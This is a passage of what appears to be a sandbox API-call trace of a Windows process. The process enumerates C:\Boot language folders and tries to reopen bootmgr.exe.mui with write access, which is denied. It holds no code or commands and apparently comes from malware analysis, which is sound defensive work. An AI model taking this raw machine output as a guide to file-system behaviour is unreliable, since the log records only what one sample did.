Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.702] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0070.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.703] FindFirstFileExW (in: lpFileName="C:\\Boot\\sk-SK\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78390 [0070.703] FindNextFileW (in: hFindFile=0x78390, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.703] FindNextFileW (in: hFindFile=0x78390, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.704] AreFileApisANSI () returned 1 [0070.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sk-SK\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sk-SK\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0070.704] AreFileApisANSI () returned 1 [0070.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0070.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 30 [0070.705] CreateFileW (lpFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.706] GetFileType (hFile=0x41c) returned 0x1 [0070.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.706] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.706] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.706] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.707] CloseHandle (hObject=0x41c) returned 1 [0070.707] AreFileApisANSI () returned 1 [0070.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 30 [0070.707] CreateFileW (lpFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.707] GetLastError () returned 0x5 [0070.707] GetLastError () returned 0x5 [0070.707] SetLastError (dwErrCode=0x5) [0070.707] GetLastError () returned 0x5 [0070.707] SetLastError (dwErrCode=0x5) [0070.707] GetLastError () returned 0x5 [0070.707] SetLastError (dwErrCode=0x5) [0070.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.707] FindNextFileW (in: hFindFile=0x78390, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ⵘ\x01⺊Ā")) returned 0 [0070.707] FindClose (in: hFindFile=0x78390 | out: hFindFile=0x78390) returned 1 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.708] AreFileApisANSI () returned 1 [0070.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sl-SI", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sl-SI", lpUsedDefaultChar=0x0) returned 14 [0070.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0070.709] AreFileApisANSI () returned 1 [0070.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88810 [0070.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88810, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sl-SI") returned 14 [0070.709] CreateFileW (lpFileName="C:\\Boot\\sl-SI" (normalized: "c:\\boot\\sl-si"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.709] GetLastError () returned 0x5 [0070.709] GetLastError () returned 0x5 [0070.709] SetLastError (dwErrCode=0x5) [0070.709] GetLastError () returned 0x5 [0070.709] SetLastError (dwErrCode=0x5) [0070.709] GetLastError () returned 0x5 [0070.709] SetLastError (dwErrCode=0x5) [0070.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.709] AreFileApisANSI () returned 1 [0070.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0070.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sl-SI") returned 14 [0070.709] CreateFileW (lpFileName="C:\\Boot\\sl-SI" (normalized: "c:\\boot\\sl-si"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.709] GetLastError () returned 0x5 [0070.709] GetLastError () returned 0x5 [0070.709] SetLastError (dwErrCode=0x5) [0070.709] GetLastError () returned 0x5 [0070.710] SetLastError (dwErrCode=0x5) [0070.710] GetLastError () returned 0x5 [0070.710] SetLastError (dwErrCode=0x5) [0070.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.710] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.710] FindFirstFileExW (in: lpFileName="C:\\Boot\\sl-SI\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78090 [0070.710] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.710] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0070.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 